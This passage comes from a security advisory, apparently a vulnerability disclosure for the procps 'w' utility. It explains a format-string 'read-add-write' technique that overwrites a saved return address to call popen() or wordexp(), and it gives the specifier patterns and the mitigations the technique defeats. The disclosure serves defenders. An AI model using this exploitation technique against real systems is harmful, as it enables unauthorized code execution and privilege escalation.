on the stack, and we write this pointer to the stack itself;  
  
- we use this pointer, and the second format-string, to overwrite the  
saved RIP with the address of a useful libc gadget (we return into  
popen() on Debian 9, and wordexp() on Fedora 27).  
  
However, unlike halfdog, we cannot defeat ASLR by simply dumping the  
contents of the stack with a format-string, because we have not access  
to the output of "w" (it is executed by another user, administrator, or  
script). Instead, we implement Chris Evans's "read-add-write" primitive  
https://scarybeastsecurity.blogspot.com/2016/11/0day-exploit-advancing-exploitation.html  
("Trick #6: co-opting an addition primitive") with format-strings only.  
  
With the first format-string:  
  
- we "read" the LSW (Least Significant Word, 32 bits) of a stack pointer  
that is located on the stack itself and hence accessible through the  
format-string arguments -- for example, the argv pointer;  
  
- we "add" a distribution-specific constant to this LSW, to make it  
point to a saved RIP on the stack -- for example, the saved RIP pushed  
onto the stack by the call to printf_positional() in vfprintf();  
  
- we "write" this modified LSW to the LSW of another stack pointer that  
is also located on the stack itself and hence accessible through the  
format-string arguments -- for example, the argv[0] pointer.  
  
With the second format-string:  
  
- we "read" the LSW of a libc pointer that is located on the stack and  
hence accessible through the format-string arguments -- for example,  
the pointer to __libc_start_main();  
  
- we "add" a distribution-specific constant to this LSW, to make it  
point to a useful libc gadget -- for example, popen() or wordexp();  
  
- we "write" this modified LSW to the LSW of a saved RIP on the stack:  
we use the pointer (to the saved RIP) created on the stack by the  
first format-string.  
  
To implement the "read-add-write" primitive:  
  
- we "read" the LSW of a pointer (we load it into vfprintf's internal  
character counter) through a variable-width specifier such as "%*R$x",  
where R is the position (among the format-string arguments on the  
stack) of the to-be-read pointer;  
  
- we "add" a constant A to this LSW through a constant-width specifier  
such as "%Ax";  
  
- we "write" this modified LSW to the LSW of another pointer through a  
specifier such as "%W$n", where W is the position (among the format-  
string arguments on the stack) of a pointer to the to-be-overwritten  
pointer (for example, in our first format-string we overwrite the LSW  
of the argv[0] pointer through the argv pointer, and in our second  
format-string we overwrite the LSW of a saved RIP through the  
overwritten argv[0] pointer); in summary:  
  
. if we want to "add" a constant to the LSW that we "read", we use a  
simple format-string such as "%*R$x%Ax%W$n", where A is equal to the  
constant that we want to add;  
  
. if we want to "subtract" a constant from the LSW that we "read", we  
use a format-string such as "%*R$x%W$n%Ax%W$hn", where A is equal to  
65536 minus the constant that we want to subtract (the smaller the  
constant, the higher the probability of success).  
  
This generic technique defeats NX, ASLR, PIE, SSP, and FORTIFY, but it  
suffers from three major drawbacks:  
  
- it requires two different format-strings, because it must reset  
vfprintf's internal character counter between the two "read-add-write"  
primitives;  
  
- its probability of success is 1/4 (not a one-shot, but not a  
brute-force either), because the probability of success of each  
"read-add-write" primitive is 1/2 (the randomized LSW that is "read"  
as an "int width" must be positive), and the stack is randomized  
independently of the libc;  
  
- it outputs 2*1GB on average (2*2GB at most): this may be acceptable if  
the target utility is executed by a script or daemon, but not if it is  
executed manually by an administrator (terminal escape sequences may  
be used to overcome this drawback, but we did not explore this  
possibility yet).  
  
It is also possible to implement distribution-specific variants of this  
generic technique: for example, we developed a Debian-specific version  
of our "w" exploit that requires only one format-string, has an 11/12  
probability of success (nearly one-shot), and outputs only a few  
kilobytes. This is left as an exercise for the interested reader.  
  
  
========================================================================  
Acknowledgments  
========================================================================  
  
We thank Craig Small and the members of linux-distros@openwall and  
security@kernel.  
`